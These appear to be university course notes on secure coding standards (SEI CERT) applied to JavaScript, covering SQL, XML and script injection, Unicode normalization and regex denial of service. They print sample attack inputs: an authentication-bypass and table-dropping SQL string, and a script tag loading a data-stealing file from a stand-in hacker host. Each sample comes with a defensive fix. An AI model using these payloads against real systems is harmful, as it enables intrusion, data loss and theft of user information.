50.003 - Code Standards
Learning Outcomes
By the end of this unit, you should be able to
- Apply the SEI CERT Java Coding Standard to improve the security level of a software system
Coding Standard
A coding standard is a common guideline for a group of software engineers to follow so as to
- have a uniform structure of most of the codes
- improve readability
- improve referenceability
- improve maintainability
- minimize exploitability
For example, we find
- https://google.github.io/styleguide/
- https://wiki.sei.cmu.edu/confluence/display/java/SEI+CERT+Oracle+Coding+Standard+for+Java
SEI CERT Java Coding Standard
Let's take the SEI CERT Java Coding Standard as an example. It consists of a set of rules which are meant to provide normative requirements for code. Each rule is associated with metrics for severity (low, medium, and high), likelihood (unlikely, probable, and likely) and remediation cost (high, medium, and low). Conformance to a rule can be determined through automated analysis (either static or dynamic), formal methods, or manual inspection techniques.
For example, we find a subset of the rules as follows,
- Input validation and data sanitization
- Object-orientation (not related for now since we focus on JavaScript). But you are strongly encouraged to read up.
- Locking and thread-safety (we've covered in some earlier unit in week 6.)
- Visibility and atomicity (not covered in this course)
Although these coding standards are set for Java and our main language for the module is JavaScript, we will discuss those that are applicable to both languages.
Input Validation and Data Sanitization
Many programs accept untrusted data originating from unvalidated users, network connections, and other untrusted sources and then pass the (modified or unmodified) data across a trust boundary to a different trusted domain. Such data must be sanitized.
For example, we find the following rules in this category
- IDS00-J. Sanitize untrusted data passed across a trust boundary
- IDS01-J. Normalize strings before validating them
- IDS11-J. Eliminate non-character code points before validation
IDS00-J. Sanitize untrusted data passed across a trust boundary
The main idea is simple: given data provided by a third party, we should sanitize it to ensure that it is not malicious.
SQL Injection
A well-known attack that exploits unsanitized data is SQL injection.
Suppose, we have the following code
async function login(db, un, pw) {
const [rows, fieldDefs] = await db.pool.query(`
SELECT * FROM db_user WHERE username='${un}' AND password='${pw}'
`);
let found = false;
if (rows.length > 0) {
found = true;
}
return found;
}
Function login takes a database connection object db, the username un and password pw, and tries to search for the user record in the db_user table.
Note that un and pw are input strings provided by external parties, which include both normal users and malicious users.
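A malicious user might set un to "" and pw to "' OR '0'='0". The query becomes
SELECT * FROM db_user WHERE username='' AND password='' OR '0'='0'
whose condition is true for every row in the db_user table. As a result, the user can log in without giving a valid user name and password.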
In the worst situation, a malicious user could give the following input un = "" and pw = "'; drop table db_user; --". The query becomes
SELECT * FROM db_user WHERE username='' AND password=''; drop table db_user; --'
As a result, all the records in the db_user table are deleted.
To prevent SQL injection attacks, a Prepared Statement should be used.
async function login(db, un, pw) {
const [rows, fieldDefs] = await db.pool.query(`
SELECT * FROM db_user WHERE username= ? AND password= ?
`, [un, pw]);
let found = false;
if (rows.length > 0) {
found = true;
}
return found;
}
In the updated version above, we use an overloaded query() that takes the statement together with a list of values to define a prepared statement. The ? placeholders allow the programmers to indicate where the untrusted input should be inserted after being sanitized. Via the prepared statement, the untrusted input strings are sanitized before they are inserted into the statement, so they are treated as data and not as part of the SQL syntax.
XML Injection
Besides SQL injection, untrusted XML data fragments pose threats to system security too.
Consider the following JavaScript program
function addIPhone(qty) {
const doc = `<item>
<description>iPhone X</description>
<price>999.0</price>
<quantity>${qty}</quantity>
</item>`;
addToCart(doc);
}
Given the input qty = "1", the resulting XML document, which captures the user's shopping item, will be processed by the addToCart() function.
Suppose a malicious user invokes the function with a rigged input qty = "1</quantity><price>1.0</price><quantity>1", which results in the following XML document
<item>
<description>iPhone X</description>
<price>999.0</price>
<quantity>1</quantity>
<price>1.0</price>
<quantity>1</quantity>
</item>
If the addToCart() function processes the elements top-to-bottom in order, it might override the price value 999.0 with 1.0.
The fix to this issue is similar to the one for SQL injection. We need to sanitize the input string before embedding it into the XML template, which is treated as trusted data.
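One way to do this for the quantity field is to validate the input against a whitelist pattern before embedding it. The sketch below assumes that a quantity is a non-negative integer. The names buildItemXml and addIPhoneSafely, and the choice of passing addToCart in as a parameter, are made up here for illustration and are not part of the original program.

```javascript
// Hypothetical helper: build the item XML only if qty is a plain unsigned integer.
function buildItemXml(qty) {
  const text = String(qty);
  // Accept digits only, so markup such as "</quantity>" can never be embedded.
  if (!/^[0-9]+$/.test(text)) {
    throw new Error("invalid quantity");
  }
  return `<item>
<description>iPhone X</description>
<price>999.0</price>
<quantity>${text}</quantity>
</item>`;
}

// addToCart is passed in as a parameter so that the sketch is self-contained.
function addIPhoneSafely(qty, addToCart) {
  addToCart(buildItemXml(qty));
}
```

With this check, the rigged input from the example above is rejected with an error instead of reaching addToCart().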
IDS01-J. Normalize strings before validating them
Cross Site Scripting
The third example of security loopholes caused by using untrusted data in a trusted context is Cross Site Scripting.
Consider the following app
app.use('/', (req,res) => {
let msg = dbmodel.getOne();
res.send(
`<div> the message is </div> <div> ${msg} </div>`
);
})
Suppose the message created by some normal user and recorded in the database is "hello". The above route handler returns
<div> the message is </div> <div> hello </div>
However, the threat surfaces when the message retrieved from the database is
"<script src='http://hacker-network.io/stealuserinfo.js' type='text/javascript'></script> "
as the resulting HTML document becomes
<div> the message is </div>
<div> <script src='http://hacker-network.io/stealuserinfo.js' type='text/javascript'></script> </div>
When this document is rendered in the victim's browser, the hacker's script is executed and can extract information from the victim's machine.
One way to address this issue is to sanitize the record retrieved from the database
app.use('/', (req,res) => {
let msg = dbmodel.getOne();
const regex = /<.*>/g;
let html = "";
if (msg.match(regex)) {
html = "<div> the message contains some illegal characters </div>";
} else {
html = `<div> the message is </div> <div> ${msg} </div>`;
}
res.send(html);
})
However, this might not cover all edge cases. Suppose the malicious user uses Unicode variants of < and >, namely \uFE64 and \uFE65, which the regex above does not match.
This motivates the need to normalize the Unicode representations into their ASCII equivalents before sanitization.
app.use('/', (req,res) => {
let msg = dbmodel.getOne();
const regex = /<.*>/g;
let html = "";
if (msg.normalize('NFKC').match(regex)) {
html = "<div> the message contains some illegal characters </div>";
} else {
html = `<div> the message is </div> <div> ${msg} </div>`;
}
res.send(html);
})
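The effect of normalization can be checked in isolation, without a web server. The sketch below reuses the pattern from the handler above. The helper name containsMarkup and the sample message are hypothetical.

```javascript
// Same pattern as in the handler; the g flag is dropped because we only test.
const regex = /<.*>/;

// Hypothetical helper: normalize to NFKC first, then validate.
function containsMarkup(msg) {
  return regex.test(msg.normalize('NFKC'));
}

// A message that uses U+FE64 and U+FE65 in place of < and >.
const disguised = "\uFE64script\uFE65alert(1)\uFE64/script\uFE65";

console.log(regex.test(disguised));     // false: the raw string has no ASCII < or >
console.log(containsMarkup(disguised)); // true: NFKC maps U+FE64 and U+FE65 to < and >
console.log(containsMarkup("hello"));   // false
```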
Using Regex to sanitize input
Regular expression (Regex) is a commonly used domain-specific language for string and data matching. It has a compact syntax and lightweight implementations. Most languages come with library support for regex. For instance, in JavaScript, we can define a regex object either with a regex literal or with the RegExp constructor.
Then we can run it against an input string, for example with the string's match() method.
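As a minimal sketch of both ways of defining a regex and of running it (the names byLiteral and byConstructor and the pattern ab+ are chosen here only for illustration):

```javascript
// Regex literal: the pattern goes between slashes, optional flags follow.
const byLiteral = /ab+/;
// RegExp constructor: pattern and flags are given as strings.
const byConstructor = new RegExp("ab+", "i");

console.log("xabbb".match(byLiteral)[0]); // 'abbb'
console.log(byConstructor.test("ABB"));   // true, because of the i flag
console.log("xyz".match(byLiteral));      // null when there is no match
```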
Here are some basic examples of constructing regex pattern.
Matching a single expression
Suppose r1 is the regex /a/, which matches a character a. When we match the input string aaa with this pattern, the result contains the part that the regex matches, which is 'a', its index, the input, and the groups if available. Note that it only searches for the pattern once in the input string.
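A minimal sketch of this match, using the name r1 from the explanation above:

```javascript
const r1 = /a/;                 // matches a single character a
const result = "aaa".match(r1); // without the g flag, only the first match is returned

console.log(result[0]);     // 'a'
console.log(result.index);  // 0
console.log(result.input);  // 'aaa'
console.log(result.groups); // undefined, since the pattern has no named groups
```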
Matching a single expression globally
If we want the regex to look for matches "globally" over the input, we add g to the flags field.
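For instance, assuming a regex named r2 (the name is chosen here to continue the numbering of the other examples):

```javascript
const r2 = /a/g;                    // g flag: find every match, not just the first
const allMatches = "aaa".match(r2); // an array holding all matched substrings

console.log(allMatches); // [ 'a', 'a', 'a' ]
```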
Case insensitivity
If we would like to ignore case during the match, we add i to the flags field.
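A short sketch of the i flag, alone and combined with g (the names r3 and r3g are hypothetical):

```javascript
const r3 = /a/i;   // i flag: ignore case
const r3g = /a/gi; // flags can be combined

console.log("AAA".match(r3)[0]); // 'A'
console.log("aAa".match(r3g));   // [ 'a', 'A', 'a' ]
console.log("AAA".match(/a/));   // null: without i, the match is case sensitive
```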
Anchored match
Sometimes we would like the regex to match the input exactly from its start to its end. We use ^ to denote the start of the input and $ to denote the end.
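A small sketch of an anchored pattern next to its unanchored counterpart (the names r4 and unanchored are hypothetical):

```javascript
const r4 = /^a$/;       // the whole input must be exactly one a
const unanchored = /a/; // an a anywhere in the input is enough

console.log(r4.test("a"));          // true
console.log(r4.test("aa"));         // false: $ requires the input to end after one a
console.log(r4.test("ba"));         // false: ^ requires the match to start at the beginning
console.log(unanchored.test("ba")); // true
```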
Character class match
If we want to match a set of alternative characters, we use
const r5 = /[ab]/g; // match everywhere with character group, a or b
"abb".match(r5); // [ 'a', 'b', 'b' ]
Note that if we use a ^ in a [] it means not, e.g. /[^ab]/ means match any character except for a and b.
Kleene's star
Kleene's star allows us to repeat a sub-regex pattern zero or more times. (Note this is different from the global flag g, which produces a list of matches).
const r6 = /a*/ // repetition, zero or more
"aaa".match(r6); // [ 'aaa', index: 0, input: 'aaa', groups: undefined ]
Reference group
Sometimes, we would like to match and extract parts of the input. We use parentheses to annotate the sub-part that we would like to extract.
const r7 = /a(a*)/ // match and extract into groups
"aaa".match(r7); // [ 'aaa', 'aa', index: 0, input: 'aaa', groups: undefined ]
In the above, we match the input and then extract the remaining a characters after the first a.
Note that we can add referenced kleene's star regex with a global flag. The following will produce an initialization error.
More on repetition
Besides Kleene's star, we have the following operators that define different constraints on repetition.
const r9 = /a+/ // repetition, one or more
const r10 = /a{2,}/ // repetition, two or more
const r11 = /a{2,3}/ // repetition, two or three
const r12 = /a{3}/ // repetition, exactly three
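To see how these operators differ, we can apply them to the same input. A short sketch (the input string is chosen here for illustration):

```javascript
const input = "aaaa";

console.log(input.match(/a+/)[0]);     // 'aaaa': one or more, as many as possible
console.log(input.match(/a{2,}/)[0]);  // 'aaaa': two or more, as many as possible
console.log(input.match(/a{2,3}/)[0]); // 'aaa': at most three
console.log(input.match(/a{3}/)[0]);   // 'aaa': exactly three
console.log("a".match(/a{2,}/));       // null: fewer than two
```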
Pitfall of using Regex as input sanitizer
There are many different algorithms for implementing regex matching. Unfortunately, many existing libraries use a back-tracking approach when performing the regex matching. This leads to a possible security threat to the software system. For example, matching a pattern that contains (a*)* followed by h against a long run of a characters with no h takes a substantial amount of time to finish, because of the nested Kleene's star in (a*)*. The back-tracking algorithm keeps back-tracking and searching for alternatives to satisfy the match with the ending h character, and there are exponentially many paths to back-track over.
In general, a nested repeatable regex that accepts an empty input is problematic. Such a pattern is classified as an evil regular expression.
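One way to remove the problem is to rewrite the pattern so that the repetition is no longer nested. The sketch below assumes an anchored pattern of the form ^(a*)*h$ as the problematic case; the names nested and flat are hypothetical. Both patterns accept the same strings, but the flat one has only one way to consume a run of a characters, so there is no exponential search. The inputs given to the nested pattern are kept short on purpose so that it still finishes quickly.

```javascript
const nested = /^(a*)*h$/; // nested Kleene's star: many ways to split a run of a's
const flat = /^a*h$/;      // same language, no nesting

for (const s of ["h", "aaah", "aaa", "aab", ""]) {
  // Both patterns agree on every input.
  console.log(JSON.stringify(s), nested.test(s), flat.test(s));
}

// A long run of a's without the final h is rejected quickly by the flat pattern.
const longRejected = flat.test("a".repeat(100000));
console.log(longRejected); // false
```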
For more details, refer to